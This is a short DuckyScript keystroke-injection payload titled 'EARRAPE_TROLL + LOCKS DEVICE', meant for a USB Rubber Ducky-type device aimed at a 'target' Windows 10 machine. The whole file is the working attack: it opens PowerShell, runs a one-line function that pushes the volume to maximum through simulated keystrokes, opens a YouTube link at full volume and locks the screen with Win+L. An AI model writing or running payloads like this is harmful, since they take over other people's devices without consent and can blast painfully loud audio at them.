REM Title: EARRAPE_TROLL + LOCKS DEVICE
REM Creator: Grim<3
REM What this script does is open powershell runs a command that makes the targets volume to max locks the targets device and plays song or sound from a youtube link 
REM For: Win10 (will use default browser)
GUI R 
DELAY 1000
STRING Powershell.exe
ENTER
DELAY 1000
STRING Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
ENTER
DELAY 2000
STRING Set-Speaker -Volume 50
ENTER 
DELAY 2000
STRING start YOUR YOUTUBE LINK WITH THE HTTPS://
ENTER
DELAY 4000
GUI L
